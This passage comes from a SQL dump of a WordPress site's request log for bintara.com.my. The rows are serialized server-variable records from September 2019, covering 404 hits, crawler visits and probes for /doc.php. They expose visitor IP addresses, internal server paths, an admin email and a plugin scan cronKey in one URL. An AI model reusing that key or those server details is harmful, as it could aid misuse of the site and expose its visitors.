18:42:22',35609312,37409664,'https://bintara.com.my/?page_id=18',1,0,'46.229.168.137'),(27284,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Whale/1.0.40.10 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"198.8.80.109\";s:11:\"REMOTE_PORT\";s:5:\"46970\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-YECR3OlNnKpGz93Xk@AAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569708048.8208\";s:12:\"REQUEST_TIME\";s:10:\"1569708048\";}}','notice','2019-09-28 22:00:50','2019-09-28 22:00:49',35130992,36931920,'https://bintara.com.my/?page_id=11',1,0,'198.8.80.109'),(27282,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY@OxXQrfbvYuOCKuiMpzgAAANU\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.158\";s:11:\"REMOTE_PORT\";s:5:\"36559\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY@OxXQrfbvYuOCKuiMpzgAAANU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569689285.4255\";s:12:\"REQUEST_TIME\";s:10:\"1569689285\";}}','notice','2019-09-28 16:48:07','2019-09-28 16:48:05',34054560,35853184,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'141.8.142.158'),(27281,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:78:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=d370e5c3475e64a18b324f87b2ae7dbf\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:51:\"End of script output before headers: admin-ajax.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:91:\"action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=d370e5c3475e64a18b324f87b2ae7dbf\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"55712\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=d370e5c3475e64a18b324f87b2ae7dbf\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:64:\"/home/norfaiz/public_html/bintara.com.my/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:24:\"/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY@M7XQrfbvYuOCKuiMpWAAAAMc\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY@M7XQrfbvYuOCKuiMpWAAAAMc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"55712\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY@M7XQrfbvYuOCKuiMpWAAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569688831.833\";s:12:\"REQUEST_TIME\";s:10:\"1569688831\";}}','notice','2019-09-28 16:40:34','2019-09-28 16:40:32',35275448,35527816,'https://bintara.com.my/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=d370e5c3475e64a18b324f87b2ae7dbf',1,0,'103.6.198.69'),(27280,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/doc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/doc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/doc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY@BgbIa2crZSgQ0QEMhhAAAAI8\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/doc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/doc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY@BgbIa2crZSgQ0QEMhhAAAAI8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"50.116.86.15\";s:11:\"REMOTE_PORT\";s:5:\"19622\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/doc.php\";s:10:\"SCRIPT_URL\";s:8:\"/doc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY@BgbIa2crZSgQ0QEMhhAAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569685889.8145\";s:12:\"REQUEST_TIME\";s:10:\"1569685889\";}}','notice','2019-09-28 15:51:31','2019-09-28 15:51:30',35181008,36990336,'https://bintara.com.my/doc.php',1,0,'50.116.86.15'),(27279,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/doc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/doc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/doc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY@BcQqEUDQMUjh8ZmvBGgAAAEc\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/doc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/doc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY@BcQqEUDQMUjh8ZmvBGgAAAEc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"50.116.86.15\";s:11:\"REMOTE_PORT\";s:5:\"18902\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/doc.php\";s:10:\"SCRIPT_URL\";s:8:\"/doc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY@BcQqEUDQMUjh8ZmvBGgAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569685873.7957\";s:12:\"REQUEST_TIME\";s:10:\"1569685873\";}}','notice','2019-09-28 15:51:16','2019-09-28 15:51:14',35571992,37378016,'https://bintara.com.my/doc.php',1,0,'50.116.86.15'),(27278,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"84.51.33.98\";s:11:\"REMOTE_PORT\";s:5:\"34217\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY9oWAqEUDQMUjh8Zmu9agAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569679448.5214\";s:12:\"REQUEST_TIME\";s:10:\"1569679448\";}}','notice','2019-09-28 14:04:11','2019-09-28 14:04:08',35521080,37326584,'https://bintara.com.my/?page_id=18',1,0,'84.51.33.98'),(27277,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY9lHAqEUDQMUjh8Zmu8-AAAAFM\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.183.21\";s:11:\"REMOTE_PORT\";s:5:\"61711\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY9lHAqEUDQMUjh8Zmu8-AAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569678620.7068\";s:12:\"REQUEST_TIME\";s:10:\"1569678620\";}}','notice','2019-09-28 13:50:22','2019-09-28 13:50:21',34065224,35871640,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.183.21'),(27276,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 